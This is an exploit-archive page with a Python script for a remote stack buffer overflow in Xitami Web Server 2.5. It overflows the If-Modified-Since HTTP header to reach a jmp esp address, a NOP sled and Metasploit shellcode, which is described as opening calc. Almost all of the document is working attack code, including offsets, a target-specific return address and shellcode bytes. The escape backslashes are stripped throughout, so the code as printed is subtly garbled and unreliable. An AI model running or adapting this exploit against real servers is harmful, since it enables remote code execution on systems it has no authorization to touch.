[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Xitami Web Server 2.5 (If-Modified-Since) Remote BoF Exploit (0day)
# Published : 2007-09-24
# Author : h07
# Previous Title : smbftpd 0.96 SMBDirList-function Remote Format String Exploit
# Next Title : AskJeeves Toolbar 4.0.2.53 activex Remote Buffer Overflow Exploit
#!/usr/bin/python
# Xitami Web Server 2.5 (If-Modified-Since) 0day Remote Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Xitami 2.5c2 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Details:..
#
# [Module xigui32.exe]
# If-Modified-Since: Evil, ["A" * 76]rn
# EIP 41414141
#
# [Module xitami.exe]
# If-Modified-Since: Evil, ["A" * 104]rn
# EIP 41414141
#
# Product Homepage: http://www.xitami.com/
# Just for fun ;)
##
from struct import pack
from time import sleep
from socket import *
host = "192.168.0.1"
port = 80
shellcode = (
"x6ax22x59xd9xeexd9x74x24xf4x5bx81x73x13x8dx6cxf6"
"xb2x83xebxfcxe2xf4x71x84xb2xb2x8dx6cx7dxf7xb1xe7"
"x8axb7xf5x6dx19x39xc2x74x7dxedxadx6dx1dxfbx06x58"
"x7dxb3x63x5dx36x2bx21xe8x36xc6x8axadx3cxbfx8cxae"
"x1dx46xb6x38xd2xb6xf8x89x7dxedxa9x6dx1dxd4x06x60"
"xbdx39xd2x70xf7x59x06x70x7dxb3x66xe5xaax96x89xaf"
"xc7x72xe9xe7xb6x82x08xacx8exbex06x2cxfax39xfdx70"
"x5bx39xe5x64x1dxbbx06xecx46xb2x8dx6cx7dxdaxb1x33"
"xc7x44xedx3ax7fx4ax0exacx8dxe2xe5x9cx7cxb6xd2x04"
"x6ex4cx07x62xa1x4dx6ax0fx97xdexeex6cxf6xb2")
opcode = pack("<L", 0x7CA76981) # jmp esp (shell32.dll / XP SP2 Polish)
jmpcode = "xebx22" # jmp short +0x22
buf = "A" * 72 # (76 - 4) xigui32.exe
buf += opcode
buf += jmpcode
buf += "x90" * 128
buf += shellcode
header = (
'GET / HTTP/1.1rn'
'Host: %srn'
'If-Modified-Since: Evil, %srn'
'rn') % (host, buf)
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(header)
sleep(1)
s.close()
print "DONE"
# EoF
# www.Syue.com [2007-09-24]